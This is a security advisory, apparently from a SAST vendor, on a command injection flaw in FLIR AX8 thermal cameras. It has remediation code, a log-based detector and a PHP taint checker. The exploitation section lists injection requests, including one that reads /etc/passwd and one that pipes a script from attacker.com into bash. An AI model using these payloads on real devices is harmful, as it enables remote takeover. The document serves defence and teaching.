
Severity: Critical (CVSS 9.8) | CVE-2023-51126 | Product: FLIR AX8 | Language: PHP

Command Injection in FLIR AX8 /usr/www/res.php via Value Parameter

CVE-2023-51126 is a critical command injection vulnerability in FLIR AX8 thermal cameras up to firmware 1.46.16, allowing remote code execution through unsanitized user input in the res.php endpoint.

Offensive360 Research Team
Affects: ≤ 1.46.16

Overview

CVE-2023-51126 represents a critical command injection vulnerability discovered in FLIR AX8 thermal imaging cameras, affecting firmware versions up to and including 1.46.16. The vulnerability exists in the /usr/www/res.php endpoint, where user-supplied input via the value parameter is passed directly to system command execution functions without proper sanitization or validation. This flaw allows unauthenticated remote attackers to execute arbitrary shell commands with the privileges of the web server process, typically root on embedded devices.

FLIR AX8 cameras are widely deployed in industrial monitoring, security infrastructure, and critical facility management applications. The thermal imaging capabilities combined with network connectivity make these devices attractive targets for both reconnaissance and persistent access in enterprise environments. The criticality of this vulnerability (CVSS 9.8) stems from its combination of network accessibility, lack of authentication requirements, and complete system compromise potential. FLIR addressed this vulnerability by introducing mitigation in firmware version 1.49.16 (January 2023), with the latest available firmware version being 1.55.16 (released June 2024).

Technical Analysis

The vulnerability originates from improper input handling in the PHP script responsible for resource operations. The res.php endpoint accepts user input through the value parameter and builds a shell command string from it dynamically, with neither validation of the value nor shell escaping of the argument.

Vulnerable Code Pattern:

<?php
// Simplified representation of vulnerable pattern in res.php
$value = $_GET['value'] ?? $_POST['value'];

// Dangerous direct command execution
$result = shell_exec("some_command " . $value);
// or
$result = system("process_data " . $value);
// or  
$result = passthru("update_resource " . $value);

echo $result;
?>

An attacker exploits this by appending shell metacharacters and command separators to the value parameter. The requests below are shown decoded for readability; in a real request the metacharacters are URL-encoded (for example %3B for ";" and %60 for a backtick). For example:

Exploitation Vector:

GET /usr/www/res.php?value=test;id; HTTP/1.1
GET /usr/www/res.php?value=test|whoami HTTP/1.1
GET /usr/www/res.php?value=test`cat /etc/passwd` HTTP/1.1
GET /usr/www/res.php?value=test$(curl attacker.com/shell.sh|bash) HTTP/1.1

The PHP functions shell_exec(), system(), passthru(), exec(), and the backtick operator all hand their argument string to /bin/sh, which parses it as a complete command line, so they are inherently dangerous with untrusted input. The absence of escapeshellarg() or escapeshellcmd() wrappers, combined with no validation against command operators (;, |, &, $(), backticks, etc.), creates a straightforward exploitation path.

The root cause is CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) and CWE-94: Improper Control of Generation of Code (‘Code Injection’).
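Because the vulnerable script takes value from the query string, exploitation attempts against unpatched units leave their metacharacters in the web server's access log. The following script is an added detection example for this write-up, not FLIR or Offensive360 code: it parses combined-format access log lines (an assumption; the five sample lines are constructed), decodes the query string once as PHP does for $_GET, and reports requests to /usr/www/res.php whose value parameter contains shell metacharacters.

```python
"""Spot CVE-2023-51126-style injection attempts against /usr/www/res.php in
web-server access logs.

Added example for this write-up, not FLIR or Offensive360 code. It assumes the
camera (or a reverse proxy in front of it) writes combined/common-format access
logs; the log lines below are constructed for the demonstration.
"""
from __future__ import annotations

import posixpath
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

TARGET_PATH = "/usr/www/res.php"

# Characters that end the intended argument and start attacker-controlled shell
# syntax: command separators, pipes, backticks, $(...)/${...}, redirects, newlines.
SHELL_META = re.compile(r"[;&|`$<>\r\n]")

# client ip, identity, user, [timestamp], "METHOD target protocol", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def suspicious_values(query: str) -> list[str]:
    """Decode the query string once (as PHP does for $_GET) and return every
    `value` parameter that contains a shell metacharacter."""
    params = parse_qs(query, keep_blank_values=True)
    return [v for v in params.get("value", []) if SHELL_META.search(v)]


def analyze_line(line: str) -> Optional[dict]:
    """Return a finding for an access-log line that targets res.php with a
    metacharacter-laden `value`, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    # Normalise the path so /usr/www//res.php, /usr/www/./res.php and
    # percent-encoded variants all compare equal to the vulnerable script.
    path = posixpath.normpath(unquote(parts.path))
    if path != TARGET_PATH:
        return None
    payloads = suspicious_values(parts.query)
    if not payloads:
        return None
    return {"ip": m["ip"], "ts": m["ts"], "method": m["method"],
            "status": int(m["status"]), "payloads": payloads}


def scan(lines) -> list[dict]:
    """Run analyze_line over an iterable of log lines and keep the findings."""
    return [f for f in (analyze_line(l) for l in lines) if f]


# Constructed sample: one benign request, three injection attempts from one
# source, and a metacharacter hit against a different script (not flagged).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2024:10:01:02 +0000] "GET /usr/www/res.php?value=option1 HTTP/1.1" 200 512
198.51.100.7 - - [12/Jan/2024:10:01:09 +0000] "GET /usr/www/res.php?value=test%3Bid%3B HTTP/1.1" 200 731
198.51.100.7 - - [12/Jan/2024:10:01:15 +0000] "GET /usr/www//res.php?value=test%60cat%20/etc/passwd%60 HTTP/1.1" 200 1900
198.51.100.7 - - [12/Jan/2024:10:01:21 +0000] "GET /usr/www/res.php?value=test%24%28curl%20203.0.113.9/s.sh%7Cbash%29 HTTP/1.1" 500 0
10.0.0.5 - - [12/Jan/2024:10:02:00 +0000] "GET /index.php?value=a%3Bb HTTP/1.1" 200 88
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']} {f['ip']} status={f['status']} value={f['payloads']!r}")
```

The script only sees what the access log records: the vulnerable script also reads $_POST, and request bodies are not logged, so a POST-based attempt is invisible here. Pair it with body logging at a reverse proxy or WAF if the cameras are reachable from anything other than a management VLAN.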

Impact

The consequences of this vulnerability are severe for affected deployments:

Remote Code Execution (RCE): Attackers achieve unrestricted command execution with the privileges of the web server process, typically root on FLIR AX8 devices, enabling complete system compromise.

Persistent Access: Attackers can install backdoors, reverse shells, or rootkits to maintain persistent access independent of the vulnerability’s remediation.

Data Exfiltration: Sensitive thermal imagery, configuration data, network topology information, and credentials stored on the device can be extracted.

Lateral Movement: Compromised devices serve as pivot points for scanning internal networks and attacking connected systems on the same subnet.

Denial of Service: Attackers can disable monitoring capabilities, corrupt device firmware, or consume system resources to render cameras non-functional.

Critical Infrastructure Exposure: Embedded cameras in critical infrastructure (power plants, manufacturing facilities, data centers) represent high-value targets for nation-state actors and sophisticated criminal groups.

How to Fix It

Immediate Mitigation:

  1. Upgrade Firmware Immediately: Update all FLIR AX8 devices to firmware version 1.49.16 or later (preferably 1.55.16, the latest stable release as of June 2024). Firmware updates can be obtained from FLIR’s official support portal.

  2. Network Segmentation: Isolate FLIR AX8 cameras on dedicated VLAN segments with restricted access controls. Disable direct internet exposure; require VPN access for remote management.

  3. Disable Unnecessary Features: If the resource endpoint functionality is unused, disable or remove access to /usr/www/res.php through web server configuration.

Remediated Code Pattern:

<?php
// Secure implementation: validate first, then keep the value away from any shell.
$value = $_GET['value'] ?? $_POST['value'] ?? '';

// 1. Whitelist the values the device actually needs; reject everything else.
$allowed_values = ['option1', 'option2', 'option3'];

if (!in_array($value, $allowed_values, true)) {
    http_response_code(400);
    die('Invalid parameter');
}

// 2. Preferred: pass the command as an array. PHP then execs the binary
//    directly and no shell ever parses $value (array form needs PHP >= 7.4).
$descriptorspec = [
    0 => ['pipe', 'r'],   // stdin
    1 => ['pipe', 'w'],   // stdout
    2 => ['pipe', 'w'],   // stderr
];

$process = proc_open(['some_command', $value], $descriptorspec, $pipes);
if (!is_resource($process)) {
    http_response_code(500);
    die('Command could not be started');
}

fclose($pipes[0]);                       // nothing is written to stdin
$result = stream_get_contents($pipes[1]);
$errors = stream_get_contents($pipes[2]);
fclose($pipes[1]);
fclose($pipes[2]);
$exit_code = proc_close($process);

if ($exit_code !== 0) {
    error_log("some_command failed ($exit_code): $errors");
    http_response_code(500);
    die('Command failed');
}

// 3. Only if a shell string is unavoidable (PHP < 7.4): escapeshellarg() quotes
//    the whole value as one argument, so test;id becomes 'test;id' and is never
//    interpreted. Use it in addition to the whitelist above, not instead of it.
// $result = shell_exec('some_command ' . escapeshellarg($value));

echo $result;
?>

Deployment Commands:

# Firmware is upgraded through the camera's web management interface: log in as
# an administrator, open the firmware upgrade section and upload 1.55.16 (or the
# latest release available from FLIR's support portal).

# Verify the running firmware version. The endpoint below is the one this
# write-up uses; confirm it against your unit's documentation before scripting it.
curl -s 'http://camera-ip/cgi-bin/admin/param.cgi?action=list' | grep -i "version"

# After the upgrade, confirm the injection no longer executes. Quote the URL and
# URL-encode the ';' as %3B: left unquoted, the local shell would run `id` on your
# own workstation and never send it to the camera.
curl -s 'http://camera-ip/usr/www/res.php?value=test%3Bid'
# A patched device returns an error or ordinary output. If a "uid=..." line from
# id appears in the response, the device is still vulnerable.

Our Take

Command injection vulnerabilities in embedded devices represent a persistent class of critical security issues that manufacturers continue to introduce despite decades of guidance. The FLIR AX8 case exemplifies poor secure development practices in IoT firmware: directly concatenating user input into shell commands is a pattern that should be eliminated through mandatory code review standards and SAST integration into build pipelines.

Organizations deploying these devices must treat firmware updates as critical security patches, not optional enhancements. Because the fixed firmware (1.49.16, January 2023) shipped before the CVE was publicised, the exposure that remains is largely devices that were never updated, which underscores the importance of maintaining an asset inventory and applying defense-in-depth controls beyond software patching. Network segmentation, authentication proxies, and activity monitoring should compensate for the likelihood of unpatched legacy devices in production environments.

Detection with SAST

Static application security testing tools detect command injection vulnerabilities through pattern matching and taint analysis:

Pattern Detection:

  • Dangerous function calls: shell_exec(), system(), passthru(), exec(), backtick operators without proper escaping
  • Taint sources: $_GET, $_POST, $_REQUEST, $argv
  • Dangerous sinks: any shell execution function receiving tainted data without escapeshellarg() or parameterized command execution

CWE Mapping:

  • CWE-78: OS Command Injection
  • CWE-94: Code Injection

Offensive360 SAST Detection: Our static analysis engine flags this vulnerability by:

  1. Tracing user input from HTTP parameters into function arguments
  2. Identifying shell execution functions without defensive wrappers
  3. Flagging concatenation operations combining user data with command strings
  4. Requiring explicit validation logic or parameterized execution patterns

// Flagged by SAST: tainted $_GET data concatenated straight into the command string
system("process " . $_GET['value']);

// Not flagged after remediation: the value is quoted as a single shell argument
system("process " . escapeshellarg($_GET['value']));
// or: the array form of proc_open() bypasses the shell entirely
proc_open(['process', $_GET['value']], ...);
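To make the four checks above concrete, here is a deliberately small taint checker written for this write-up. It is an added example, not the Offensive360 engine and not FLIR code: it tracks $_GET/$_POST/$_REQUEST/$_COOKIE/$argv taint through simple assignments into the PHP shell sinks, and treats an escapeshellarg() wrapper, a strict in_array() whitelist check, and the array form of proc_open() as safe. It assumes one PHP statement per line (no multi-line calls); the PHP it scans is a constructed sample built from the patterns on this page.

```python
"""Minimal taint-style checker for PHP shell-command sinks.

Added example for this write-up (not Offensive360's engine and not FLIR code).
Assumes one statement per line. Heuristics: escapeshellarg(...) spans are
treated as sanitized, a strict in_array($var, ..., true) check clears taint on
$var, and proc_open() with an array command is not a shell sink.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

SOURCE_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b|\$argv\b")
SINK_RE = re.compile(r"\b(shell_exec|system|passthru|exec|popen|proc_open)\s*\((.*)\)")
BACKTICK_RE = re.compile(r"`([^`]*)`")
ASSIGN_RE = re.compile(r"^\s*(\$\w+)\s*=(?!=)\s*(.+);\s*$")
WHITELIST_RE = re.compile(r"in_array\s*\(\s*(\$\w+)\s*,[^)]*,\s*true\s*\)")
# escapeshellarg( ... ) allowing one level of nested parentheses inside
SANITIZED_RE = re.compile(r"escapeshellarg\s*\((?:[^()]|\([^()]*\))*\)")
VAR_RE = re.compile(r"\$\w+")


@dataclass
class Finding:
    line: int
    sink: str
    code: str


def _strip_comment(line: str) -> str:
    # Drop trailing "// ..." comments; require leading whitespace so "http://" survives.
    return re.sub(r"\s//.*$", "", line).rstrip()


def _is_tainted(expr: str, tainted: set[str]) -> bool:
    """True if expr references a taint source or a tainted variable outside
    any escapeshellarg(...) wrapper."""
    cleaned = SANITIZED_RE.sub("''", expr)
    if SOURCE_RE.search(cleaned):
        return True
    return any(v in tainted for v in VAR_RE.findall(cleaned))


def scan_php(source: str) -> list[Finding]:
    """Return one Finding per shell sink whose argument is tainted."""
    tainted: set[str] = set()
    findings: list[Finding] = []
    for no, raw in enumerate(source.splitlines(), 1):
        line = _strip_comment(raw)
        # Validation: a strict whitelist check clears taint on that variable.
        m = WHITELIST_RE.search(line)
        if m:
            tainted.discard(m.group(1))
        # Sinks: flag when the command expression is tainted (array-form
        # proc_open never reaches a shell, so it is skipped).
        m = SINK_RE.search(line)
        if m:
            sink, args = m.group(1), m.group(2)
            array_form = sink == "proc_open" and args.lstrip().startswith(("[", "array("))
            if not array_form and _is_tainted(args, tainted):
                findings.append(Finding(no, sink, line.strip()))
        for bt in BACKTICK_RE.finditer(line):
            if _is_tainted(bt.group(1), tainted):
                findings.append(Finding(no, "backtick", line.strip()))
        # Assignments propagate taint; assigning a sanitized value clears it.
        m = ASSIGN_RE.match(line)
        if m:
            var, expr = m.group(1), m.group(2)
            if _is_tainted(expr, tainted):
                tainted.add(var)
            else:
                tainted.discard(var)
    return findings


# Constructed sample built from the vulnerable and remediated patterns above.
SAMPLE_PHP = """\
<?php
$value = $_GET['value'] ?? $_POST['value'];
$result = shell_exec("some_command " . $value);
system("process " . $_GET['value']);
$out = `update_resource $value`;
system("process " . escapeshellarg($_GET['value']));
$safe = escapeshellarg($value);
passthru("update_resource " . $safe);
$p = proc_open(['process', $_GET['value']], $spec, $pipes);
$p = proc_open("process " . $value, $spec, $pipes);
if (!in_array($value, ['option1', 'option2'], true)) { die('Invalid'); }
exec("process " . $value);
"""

if __name__ == "__main__":
    for f in scan_php(SAMPLE_PHP):
        print(f"line {f.line}: {f.sink}: {f.code}")
```

Lines 3, 4, 5 and 10 of the sample are reported; the escapeshellarg() calls, the array-form proc_open() and the exec() that follows the whitelist check are not. A production SAST engine does the same tracing across functions, files and string-building helpers, which is exactly where a regex-per-line tool like this one stops being trustworthy.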

#command-injection #php #flir-ax8 #remote-code-execution #iot
